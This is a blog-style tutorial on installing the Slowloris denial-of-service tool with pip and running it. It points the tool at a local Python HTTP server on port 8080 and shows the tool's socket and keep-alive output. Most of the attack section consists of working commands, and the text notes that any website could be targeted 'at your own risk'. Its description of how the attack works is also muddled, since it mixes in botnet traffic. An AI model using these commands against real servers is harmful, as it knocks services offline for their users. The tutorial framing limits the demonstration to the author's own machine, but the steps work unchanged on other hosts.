Welcome back to another tutorial on GigoCyberSpace. Slowloris is a powerful tool developed by the hacker Rsnake. It works by sending partial (incomplete) packets to a server higher than the capacity of the server. Today we are going to learn how to use the tool and use it on a real time system.
But in a advance sense, this is how Slowloris work:
When you perform a DDOS attack
with Slowloris, it sends partial
(incomplete) packet with a HTTP
request to the server.
Slowloris tries to keep the HTTP
connection as long as possible
It continues maybe with random
agent if configure, higher than the
server ability causing a heavy
botnet traffic making it unavailable
to users
For easier understanding, just look at the diagram:
So now, we are going to perform a ddos attack. But we are going to do that by installation using pip in python 3
Step 1
Install the repository
We would have install the repository from GitHub, bit in this tutorial we will install Slowloris using python3 pip command
~/slowloris $ pip3 install slowloris
Collecting slowloris
Downloading Slowloris-0.2.5-py3
none-any.whl (4.6 kB)
Installing collected packages:
slowloris
Successfully installed slowloris-
0.2.5
This is the tool we will use to do the ddos attack.
Step 2
Start your local Server
For this tutorial, we going to be using python HTTP server. Open your terminal and type:
~ $ python3 -m http.server 8080
Serving HTTP on :: port 8080 (http://[::]:8080/) ...
This server active and running is the sever we're going to perform the ddos. We can use any website or server, but it is at your own risk. Become this can stop people from reaching the website. So the best source is your server, for a ethical hacker.
Step 3
Let's perform the DDOS attack
This is the main and core of the ddos. We use slowloris we installed though pip. We type:
~ $ slowloris localhost -p 8080 -s 250
[07-01-2023 19:09:59] Attacking localhost with
250 sockets.
[07-01-2023 19:09:59] Creating sockets...
[07-01-2023 19:10:00] Sending keep-alive headers...
[07-01-2023 19:10:00] Socket count: 250
[07-01-2023 19:10:15] Sending keep-alive headers...
[07-01-2023 19:10:15] Socket count: 250
[07-01-2023 19:10:30] Sending keep-alive headers...
[07-01-2023 19:10:30] Socket count: 250
Where localhost is the client we are attacking, -p 8080 is the port number and -s 250 is the number of sockets of request
And we see the result:
This is just a simple screenshot. But when you do it on an actual system, you see that it delay to response. See you next time !